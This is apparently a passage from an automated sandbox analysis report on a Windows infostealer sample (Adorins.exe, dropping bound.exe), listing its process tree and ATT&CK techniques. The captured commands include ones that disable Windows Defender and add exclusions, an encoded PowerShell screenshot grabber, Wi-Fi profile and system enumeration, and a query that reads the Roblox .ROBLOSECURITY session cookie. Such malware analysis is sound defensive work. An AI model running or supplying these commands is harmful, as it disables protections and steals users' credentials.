PID 1832 wrote to memory of 3988	1832	Adorins.exe	87
PID 1832 wrote to memory of 3988	1832	Adorins.exe	87
PID 1832 wrote to memory of 3420	1832	Adorins.exe	88
PID 1832 wrote to memory of 3420	1832	Adorins.exe	88
PID 1832 wrote to memory of 4512	1832	Adorins.exe	89
PID 1832 wrote to memory of 4512	1832	Adorins.exe	89
PID 1832 wrote to memory of 2360	1832	Adorins.exe	90
PID 1832 wrote to memory of 2360	1832	Adorins.exe	90
PID 1832 wrote to memory of 2196	1832	Adorins.exe	93
PID 1832 wrote to memory of 2196	1832	Adorins.exe	93
PID 1832 wrote to memory of 1844	1832	Adorins.exe	97
PID 1832 wrote to memory of 1844	1832	Adorins.exe	97
PID 1844 wrote to memory of 1728	1844	cmd.exe	99
PID 1844 wrote to memory of 1728	1844	cmd.exe	99
PID 2196 wrote to memory of 2888	2196	cmd.exe	100
PID 2196 wrote to memory of 2888	2196	cmd.exe	100
PID 3988 wrote to memory of 3068	3988	cmd.exe	101
PID 3988 wrote to memory of 3068	3988	cmd.exe	101
PID 3420 wrote to memory of 3484	3420	cmd.exe	102
PID 3420 wrote to memory of 3484	3420	cmd.exe	102
PID 2360 wrote to memory of 2272	2360	cmd.exe	103
PID 2360 wrote to memory of 2272	2360	cmd.exe	103
PID 4512 wrote to memory of 5084	4512	cmd.exe	104
PID 4512 wrote to memory of 5084	4512	cmd.exe	104
PID 2272 wrote to memory of 4792	2272	bound.exe	107
PID 2272 wrote to memory of 4792	2272	bound.exe	107
PID 4792 wrote to memory of 2104	4792	cmd.exe	108
PID 4792 wrote to memory of 2104	4792	cmd.exe	108
PID 1832 wrote to memory of 2016	1832	Adorins.exe	109
PID 1832 wrote to memory of 2016	1832	Adorins.exe	109
PID 2016 wrote to memory of 3316	2016	cmd.exe	111
PID 2016 wrote to memory of 3316	2016	cmd.exe	111
PID 1832 wrote to memory of 4224	1832	Adorins.exe	112
PID 1832 wrote to memory of 4224	1832	Adorins.exe	112
PID 4224 wrote to memory of 4364	4224	cmd.exe	114
PID 4224 wrote to memory of 4364	4224	cmd.exe	114
PID 1832 wrote to memory of 1960	1832	Adorins.exe	115
PID 1832 wrote to memory of 1960	1832	Adorins.exe	115
PID 1960 wrote to memory of 3160	1960	cmd.exe	117
PID 1960 wrote to memory of 3160	1960	cmd.exe	117
PID 4792 wrote to memory of 628	4792	cmd.exe	118
PID 4792 wrote to memory of 628	4792	cmd.exe	118
PID 1832 wrote to memory of 2928	1832	Adorins.exe	119
PID 1832 wrote to memory of 2928	1832	Adorins.exe	119
PID 2928 wrote to memory of 3216	2928	cmd.exe	121
PID 2928 wrote to memory of 3216	2928	cmd.exe	121
PID 1832 wrote to memory of 5068	1832	Adorins.exe	122
PID 1832 wrote to memory of 5068	1832	Adorins.exe	122
PID 5068 wrote to memory of 2392	5068	cmd.exe	124
PID 5068 wrote to memory of 2392	5068	cmd.exe	124
PID 4792 wrote to memory of 1312	4792	cmd.exe	125
PID 4792 wrote to memory of 1312	4792	cmd.exe	125
PID 1832 wrote to memory of 2156	1832	Adorins.exe	126
PID 1832 wrote to memory of 2156	1832	Adorins.exe	126
PID 1832 wrote to memory of 1376	1832	Adorins.exe	127
PID 1832 wrote to memory of 1376	1832	Adorins.exe	127
PID 1832 wrote to memory of 1192	1832	Adorins.exe	130
PID 1832 wrote to memory of 1192	1832	Adorins.exe	130
PID 1832 wrote to memory of 2276	1832	Adorins.exe	131
PID 1832 wrote to memory of 2276	1832	Adorins.exe	131
PID 2156 wrote to memory of 4948	2156	cmd.exe	134
PID 2156 wrote to memory of 4948	2156	cmd.exe	134

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4744	attrib.exe
3632	attrib.exe
5312	attrib.exe
5740	attrib.exe
3388	attrib.exe
3060	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Adorins.exe
"C:\Users\Admin\AppData\Local\Temp\Adorins.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1964
- C:\Users\Admin\AppData\Local\Temp\Adorins.exe
  "C:\Users\Admin\AppData\Local\Temp\Adorins.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Adorins.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Adorins.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2360
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2272
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5360.tmp\5361.tmp\5362.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4792
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:2104
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:628
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:1312
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FI "IMAGENAME eq robloxplayerbeta.exe"
        6⤵
        Enumerates processes with tasklist
        
        PID:2152
      - C:\Windows\system32\find.exe
        
        find /I /N "robloxplayerbeta.exe"
        6⤵
        
        PID:2412
      - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        6⤵
        Delays execution with timeout.exe
        
        PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2196
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2016
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4224
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1960
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2156
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1376
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1192
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:2276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2380
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3016
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:1552
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:2852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1948
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1056
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4876
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hk2zx2pl\hk2zx2pl.cmdline"
        5⤵
        
        PID:4764
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES61C7.tmp" "c:\Users\Admin\AppData\Local\Temp\hk2zx2pl\CSCE9D6962108C4BD496A9A03E9B618259.TMP"
        6⤵
        
        PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1356
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3172
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4768
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2060
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4268
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2188
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2180
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4456
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1356
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4308
- - C:\Windows\system32\cmd.exe
